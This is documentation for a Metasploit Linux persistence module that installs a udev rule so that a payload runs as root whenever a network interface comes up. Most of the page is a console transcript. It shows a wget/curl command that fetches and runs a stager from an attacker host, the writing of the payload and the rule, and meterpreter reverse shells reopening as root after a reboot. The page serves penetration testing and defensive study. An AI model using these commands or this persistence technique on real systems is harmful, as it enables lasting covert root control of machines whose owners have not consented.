Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/linux/persistence/udev.md
28810 views

Vulnerable Application

This is a post module that performs a persistence installation on a Linux system using udev. The persistence execution with be triggered with root privileges everytime a network interface other than l0 comes up. Execution is triggered through at command, so it must be installed on the target.

Verification Steps

  1. Start msfconsole

  2. Obtain a root session on the target machine

  3. use exploit/linux/persistence/udev

  4. set session -1

  5. exploit

Options

PAYLOAD_NAME

Name of the payload file to write. Defaults to random.

UDEV_PATH

Path to udev rules folder. Defaults to /lib/udev/rules.d/

UDEV_RULE

Rule name for udev. Defaults to random

Scenarios

Module usage

Ubuntu 24.04

Initial shell

resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 2.2.2.2
lhost => 2.2.2.2
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 7
target => 7
resource (/root/.msf4/msfconsole.rc)> set srvport 8082
srvport => 8082
resource (/root/.msf4/msfconsole.rc)> set uripath l
uripath => l
resource (/root/.msf4/msfconsole.rc)> set payload payload/linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4446
lport => 4446
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 2.2.2.2:4446 
[*] Using URL: http://2.2.2.2:8082/l
[*] Server started.
[*] Run the following command on the target machine:
wget -qO Qjdo0XSK --no-check-certificate http://2.2.2.2:8082/l; chmod +x Qjdo0XSK; ./Qjdo0XSK& disown
msf exploit(multi/script/web_delivery) > 
[*] 1.1.1.1    web_delivery - Delivering Payload (250 bytes)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 1 opened (2.2.2.2:4446 -> 1.1.1.1:43842) at 2025-12-20 16:24:02 -0500

msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 1.1.1.1
OS           : Ubuntu 24.04 (Linux 6.8.0-31-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > background
[*] Backgrounding session 1...

Persistence install

msf exploit(multi/script/web_delivery) > use exploit/linux/persistence/udev 
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(linux/persistence/udev) > set session 1
session => 1
msf exploit(linux/persistence/udev) > set WritableDir /opt/
WritableDir => /opt/
msf exploit(linux/persistence/udev) > exploit
[*] Command to run on remote host: curl -so ./eULGakHgwKeL http://2.2.2.2:8080/t70WmtC4mNeBieRpZqn09Q;chmod +x ./eULGakHgwKeL;./eULGakHgwKeL&
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Fetch handler listening on 2.2.2.2:8080
[*] HTTP server started
[*] Adding resource /t70WmtC4mNeBieRpZqn09Q
[*] Started reverse TCP handler on 2.2.2.2:4444 
msf exploit(linux/persistence/udev) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. likely exploitable
[*] Writing '/opt//Z7CpOCzhzq' (271 bytes) ...
[+] /opt//Z7CpOCzhzq written
[+] /lib/udev/rules.d//41-EInB5urA.rules written
[*] Triggering udev rule
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/1.1.1.1_20251220.5601/1.1.1.1_20251220.5601.rc
[*] Client 1.1.1.1 requested /t70WmtC4mNeBieRpZqn09Q
[*] Sending payload to 1.1.1.1 (curl/8.5.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 2 opened (2.2.2.2:4444 -> 1.1.1.1:38100) at 2025-12-20 16:56:03 -0500

Trigger a reboot to test the persistence

msf exploit(linux/persistence/udev) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 1394 created.
Channel 8 created.
reboot

[*] 1.1.1.1 - Meterpreter session 1 closed.  Reason: Died


Terminate channel 8? [y/N]  y
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
msf exploit(linux/persistence/udev) > 
[*] Client 1.1.1.1 requested /t70WmtC4mNeBieRpZqn09Q
[*] Sending payload to 1.1.1.1 (curl/8.5.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3090404 bytes) to 1.1.1.1
[*] Meterpreter session 3 opened (2.2.2.2:4444 -> 1.1.1.1:35550) at 2025-12-20 16:56:38 -0500
[*] 1.1.1.1 - Meterpreter session 2 closed.  Reason: Died

msf exploit(linux/persistence/udev) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > getuid
Server username: root
meterpreter >